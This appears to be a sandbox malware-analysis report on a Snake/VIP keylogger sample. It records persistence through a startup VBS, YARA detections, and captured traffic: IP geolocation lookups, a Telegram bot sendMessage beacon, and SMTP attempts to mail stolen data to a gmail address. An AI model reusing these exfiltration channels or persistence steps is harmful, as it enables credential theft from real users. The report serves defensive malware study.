                                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      16192.168.2.949943104.21.32.14437824C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-11 05:49:34 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      2025-01-11 05:49:34 UTC853INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:34 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 362
                                                                                                                      Connection: close
                                                                                                                      Age: 1889363
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      cf-cache-status: HIT
                                                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lysRe278AtVWcLjCCd%2BvCAQzwsTDidUUY1qvb7yeoyaWpDXKuHVoNJQp28rBi1ukses64R4C0%2B6d2I7JlOy6ncyoSuWm3VMv6X2lAznguZYhmeb4lLCmFFCWHdMgGWzIGzvBe8Nc"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 90029fd27ea3c327-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1619&min_rtt=1617&rtt_var=611&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1785932&cwnd=189&unsent_bytes=0&cid=0b6fcd2b6c87604d&ts=135&x=0"
                                                                                                                      2025-01-11 05:49:34 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      17192.168.2.949953104.21.32.14437824C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-11 05:49:35 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2025-01-11 05:49:35 UTC859INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:35 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 362
                                                                                                                      Connection: close
                                                                                                                      Age: 1889364
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      cf-cache-status: HIT
                                                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d85g7i2In4ylQwkmziq4Q4NIxhFC37%2F9BNZSTRE%2FWp0QYyu5dakFu%2F4I31sZCZwExcDjj8Uht9OGMVIhR9MZidOBjAtmVN9qtVnRccMZeLzIeFmN4l3Lc2n%2FQxz%2FSmzAWoMgnk11"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 90029fda5d158cda-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1806&min_rtt=1806&rtt_var=677&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1615938&cwnd=243&unsent_bytes=0&cid=b8f2fba744f3548c&ts=140&x=0"
                                                                                                                      2025-01-11 05:49:35 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      18192.168.2.949963104.21.32.14437824C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-11 05:49:36 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      2025-01-11 05:49:37 UTC859INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:37 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 362
                                                                                                                      Connection: close
                                                                                                                      Age: 1889366
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      cf-cache-status: HIT
                                                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cYwfVqbb%2By3B9K7fV7S2uKXKg3qNaoj%2BjMn%2FTy1hq8Z8x%2FBr9z2nxryjcwaAuRNKzOaLT2v3aeTetncVjkc71iJD9uTsiuVndWJSlqnwvtEJTvv3NlqTKG6s5UP0v%2FdasybNYGC1"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 90029fe2384dc327-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1729&min_rtt=1728&rtt_var=650&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1681059&cwnd=189&unsent_bytes=0&cid=1873b66b514378ef&ts=149&x=0"
                                                                                                                      2025-01-11 05:49:37 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      19192.168.2.949969149.154.167.2204437824C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-11 05:49:37 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:549163%0D%0ADate%20and%20Time:%2011/01/2025%20/%2011:35:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20549163%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                      Host: api.telegram.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2025-01-11 05:49:37 UTC344INHTTP/1.1 404 Not Found
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:37 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 55
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2025-01-11 05:49:37 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                      Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                      SMTP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                      Jan 11, 2025 06:49:29.621413946 CET587499043.130.71.34192.168.2.9220 acadental.com ESMTP Postfix (Ubuntu)
                                                                                                                      Jan 11, 2025 06:49:29.624731064 CET49904587192.168.2.93.130.71.34EHLO 549163
                                                                                                                      Jan 11, 2025 06:49:29.742240906 CET587499043.130.71.34192.168.2.9250-acadental.com
                                                                                                                      250-PIPELINING
                                                                                                                      250-SIZE 30971520
                                                                                                                      250-ETRN
                                                                                                                      250-STARTTLS
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-ENHANCEDSTATUSCODES
                                                                                                                      250-8BITMIME
                                                                                                                      250-DSN
                                                                                                                      250 SMTPUTF8
                                                                                                                      Jan 11, 2025 06:49:29.751265049 CET49904587192.168.2.93.130.71.34AUTH login c2hpcHBpbmdAYWNhZGVudGFsLmNvbQ==
                                                                                                                      Jan 11, 2025 06:49:29.869220972 CET587499043.130.71.34192.168.2.9334 UGFzc3dvcmQ6
                                                                                                                      Jan 11, 2025 06:49:33.393220901 CET587499043.130.71.34192.168.2.9535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                                                                      Jan 11, 2025 06:49:33.397207975 CET49904587192.168.2.93.130.71.34MAIL FROM:<shipping@acadental.com>
                                                                                                                      Jan 11, 2025 06:49:33.519442081 CET587499043.130.71.34192.168.2.9250 2.1.0 Ok
                                                                                                                      Jan 11, 2025 06:49:33.519679070 CET49904587192.168.2.93.130.71.34RCPT TO:<enquiry.zamehinc@gmail.com>
                                                                                                                      Jan 11, 2025 06:49:33.637856960 CET587499043.130.71.34192.168.2.9501 5.5.2 <549163>: Helo command rejected: Invalid name
                                                                                                                      Jan 11, 2025 06:49:43.792289972 CET587500093.130.71.34192.168.2.9220 acadental.com ESMTP Postfix (Ubuntu)
                                                                                                                      Jan 11, 2025 06:49:43.792515993 CET50009587192.168.2.93.130.71.34EHLO 549163
                                                                                                                      Jan 11, 2025 06:49:44.080157995 CET587500093.130.71.34192.168.2.9250-acadental.com
                                                                                                                      250-PIPELINING
                                                                                                                      250-SIZE 30971520
                                                                                                                      250-ETRN
                                                                                                                      250-STARTTLS
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-ENHANCEDSTATUSCODES
                                                                                                                      250-8BITMIME
                                                                                                                      250-DSN
                                                                                                                      250 SMTPUTF8
                                                                                                                      Jan 11, 2025 06:49:44.080461979 CET50009587192.168.2.93.130.71.34AUTH login c2hpcHBpbmdAYWNhZGVudGFsLmNvbQ==
                                                                                                                      Jan 11, 2025 06:49:48.199358940 CET587500093.130.71.34192.168.2.9334 UGFzc3dvcmQ6
                                                                                                                      Jan 11, 2025 06:49:52.112340927 CET587500093.130.71.34192.168.2.9535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                                                                      Jan 11, 2025 06:49:52.112689972 CET50009587192.168.2.93.130.71.34MAIL FROM:<shipping@acadental.com>
                                                                                                                      Jan 11, 2025 06:49:52.232073069 CET587500093.130.71.34192.168.2.9250 2.1.0 Ok
                                                                                                                      Jan 11, 2025 06:49:52.232239008 CET50009587192.168.2.93.130.71.34RCPT TO:<enquiry.zamehinc@gmail.com>
                                                                                                                      Jan 11, 2025 06:49:52.352147102 CET587500093.130.71.34192.168.2.9501 5.5.2 <549163>: Helo command rejected: Invalid name

                                                                                                                      Statistics

                                                                                                                      CPU Usage

                                                                                                                      Click to jump to process

                                                                                                                      Memory Usage

                                                                                                                      Click to jump to process

                                                                                                                      High Level Behavior Distribution

                                                                                                                      Click to dive into process behavior distribution

                                                                                                                      Behavior

                                                                                                                      Click to jump to process

                                                                                                                      System Behavior

                                                                                                                      General

                                                                                                                      Target ID:0
                                                                                                                      Start time:00:49:02
                                                                                                                      Start date:11/01/2025
                                                                                                                      Path:C:\Users\user\Desktop\ty1nyFUMlo.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\ty1nyFUMlo.exe"
                                                                                                                      Imagebase:0x510000
                                                                                                                      File size:1'096'704 bytes
                                                                                                                      MD5 hash:A3D99BCF752D0B63FA8D5515A4765777
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:2
                                                                                                                      Start time:00:49:05
                                                                                                                      Start date:11/01/2025
                                                                                                                      Path:C:\Users\user\AppData\Local\translucently\enterogenous.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\ty1nyFUMlo.exe"
                                                                                                                      Imagebase:0xa30000
                                                                                                                      File size:1'096'704 bytes
                                                                                                                      MD5 hash:A3D99BCF752D0B63FA8D5515A4765777
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 100%, Avira
                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                      • Detection: 74%, ReversingLabs
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:3
                                                                                                                      Start time:00:49:08
                                                                                                                      Start date:11/01/2025
                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\ty1nyFUMlo.exe"
                                                                                                                      Imagebase:0xeb0000
                                                                                                                      File size:45'984 bytes
                                                                                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3795172591.0000000003378000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.3795172591.0000000003271000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:high
                                                                                                                      Has exited:false

                                                                                                                      General

                                                                                                                      Target ID:5
                                                                                                                      Start time:00:49:19
                                                                                                                      Start date:11/01/2025
                                                                                                                      Path:C:\Windows\System32\wscript.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\enterogenous.vbs"
                                                                                                                      Imagebase:0x7ff76d940000
                                                                                                                      File size:170'496 bytes
                                                                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:6
                                                                                                                      Start time:00:49:20
                                                                                                                      Start date:11/01/2025
                                                                                                                      Path:C:\Users\user\AppData\Local\translucently\enterogenous.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\AppData\Local\translucently\enterogenous.exe"
                                                                                                                      Imagebase:0xa30000
                                                                                                                      File size:1'096'704 bytes
                                                                                                                      MD5 hash:A3D99BCF752D0B63FA8D5515A4765777
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:7
                                                                                                                      Start time:00:49:24
                                                                                                                      Start date:11/01/2025
                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\AppData\Local\translucently\enterogenous.exe"
                                                                                                                      Imagebase:0xf30000
                                                                                                                      File size:45'984 bytes
                                                                                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.3794762480.00000000033E8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.3794762480.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:high
                                                                                                                      Has exited:false

                                                                                                                      Disassembly

                                                                                                                      Reset < >

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:2.8%
                                                                                                                        Dynamic/Decrypted Code Coverage:0.9%
                                                                                                                        Signature Coverage:4.8%
                                                                                                                        Total number of Nodes:1977
                                                                                                                        Total number of Limit Nodes:54
                                                                                                                        execution_graph 95936 511033 95941 514c91 95936->95941 95940 511042 95949 51a961 95941->95949 95946 514d9c 95947 511038 95946->95947 95957 5151f7 22 API calls __fread_nolock 95946->95957 95948 5300a3 29 API calls __onexit 95947->95948 95948->95940 95958 52fe0b 95949->95958 95951 51a976 95968 52fddb 95951->95968 95953 514cff 95954 513af0 95953->95954 95993 513b1c 95954->95993 95957->95946 95960 52fddb 95958->95960 95961 52fdfa 95960->95961 95964 52fdfc 95960->95964 95978 53ea0c 95960->95978 95985 534ead 7 API calls 2 library calls 95960->95985 95961->95951 95963 53066d 95987 5332a4 RaiseException 95963->95987 95964->95963 95986 5332a4 RaiseException 95964->95986 95967 53068a 95967->95951 95970 52fde0 95968->95970 95969 53ea0c ___std_exception_copy 21 API calls 95969->95970 95970->95969 95971 52fdfa 95970->95971 95974 52fdfc 95970->95974 95990 534ead 7 API calls 2 library calls 95970->95990 95971->95953 95973 53066d 95992 5332a4 RaiseException 95973->95992 95974->95973 95991 5332a4 RaiseException 95974->95991 95977 53068a 95977->95953 95982 543820 pre_c_initialization 95978->95982 95979 54385e 95989 53f2d9 20 API calls _free 95979->95989 95980 543849 RtlAllocateHeap 95980->95982 95983 54385c 95980->95983 95982->95979 95982->95980 95988 534ead 7 API calls 2 library calls 95982->95988 95983->95960 95985->95960 95986->95963 95987->95967 95988->95982 95989->95983 95990->95970 95991->95973 95992->95977 95994 513b0f 95993->95994 95995 513b29 95993->95995 95994->95946 95995->95994 95996 513b30 RegOpenKeyExW 95995->95996 95996->95994 95997 513b4a RegQueryValueExW 95996->95997 95998 513b80 RegCloseKey 95997->95998 95999 513b6b 95997->95999 95998->95994 95999->95998 96000 563f75 96011 52ceb1 96000->96011 96002 563f8b 96003 564006 96002->96003 96078 52e300 23 API calls 96002->96078 96020 51bf40 96003->96020 96007 563fe6 96009 564052 96007->96009 96079 581abf 22 API calls 96007->96079 96008 564a88 96009->96008 96080 58359c 82 API calls __wsopen_s 96009->96080 96012 52ced2 96011->96012 96013 52cebf 96011->96013 96015 52ced7 96012->96015 96016 52cf05 96012->96016 96081 51aceb 23 API calls messages 96013->96081 96018 52fddb 22 API calls 96015->96018 96082 51aceb 23 API calls messages 96016->96082 96019 52cec9 96018->96019 96019->96002 96083 51adf0 96020->96083 96022 51bf9d 96023 5604b6 96022->96023 96024 51bfa9 96022->96024 96102 58359c 82 API calls __wsopen_s 96023->96102 96026 5604c6 96024->96026 96027 51c01e 96024->96027 96103 58359c 82 API calls __wsopen_s 96026->96103 96088 51ac91 96027->96088 96030 51c7da 96037 52fe0b 22 API calls 96030->96037 96032 577120 22 API calls 96075 51c039 __fread_nolock messages 96032->96075 96033 5609bf 96064 51c603 96033->96064 96145 58359c 82 API calls __wsopen_s 96033->96145 96036 5604f5 96043 56055a 96036->96043 96104 52d217 235 API calls 96036->96104 96042 51c808 __fread_nolock 96037->96042 96041 51ec40 235 API calls 96041->96075 96044 52fe0b 22 API calls 96042->96044 96043->96064 96105 58359c 82 API calls __wsopen_s 96043->96105 96076 51c350 __fread_nolock messages 96044->96076 96045 51af8a 22 API calls 96045->96075 96046 56091a 96139 583209 23 API calls 96046->96139 96049 5608a5 96113 51ec40 96049->96113 96052 5608cf 96052->96064 96137 51a81b 41 API calls 96052->96137 96053 560591 96106 58359c 82 API calls __wsopen_s 96053->96106 96054 5608f6 96138 58359c 82 API calls __wsopen_s 96054->96138 96059 51c237 96061 51c253 96059->96061 96140 51a8c7 96059->96140 96065 560976 96061->96065 96069 51c297 messages 96061->96069 96062 52fe0b 22 API calls 96062->96075 96064->96009 96144 51aceb 23 API calls messages 96065->96144 96067 52fddb 22 API calls 96067->96075 96069->96033 96099 51aceb 23 API calls messages 96069->96099 96071 51c335 96071->96033 96072 51c342 96071->96072 96100 51a704 22 API calls messages 96072->96100 96073 51bbe0 40 API calls 96073->96075 96075->96030 96075->96032 96075->96033 96075->96036 96075->96041 96075->96042 96075->96043 96075->96045 96075->96046 96075->96049 96075->96053 96075->96054 96075->96059 96075->96062 96075->96064 96075->96067 96075->96073 96092 51ad81 96075->96092 96107 577099 22 API calls __fread_nolock 96075->96107 96108 595745 54 API calls _wcslen 96075->96108 96109 52aa42 22 API calls messages 96075->96109 96110 57f05c 40 API calls 96075->96110 96111 51a993 41 API calls 96075->96111 96112 51aceb 23 API calls messages 96075->96112 96077 51c3ac 96076->96077 96101 52ce17 22 API calls messages 96076->96101 96077->96009 96078->96007 96079->96003 96080->96008 96081->96019 96082->96019 96084 51ae01 96083->96084 96087 51ae1c messages 96083->96087 96146 51aec9 96084->96146 96086 51ae09 CharUpperBuffW 96086->96087 96087->96022 96090 51acae 96088->96090 96089 51acd1 96089->96075 96090->96089 96152 58359c 82 API calls __wsopen_s 96090->96152 96093 51ad92 96092->96093 96094 55fadb 96092->96094 96095 52fddb 22 API calls 96093->96095 96096 51ad99 96095->96096 96153 51adcd 96096->96153 96099->96071 96100->96076 96101->96076 96102->96026 96103->96064 96104->96043 96105->96064 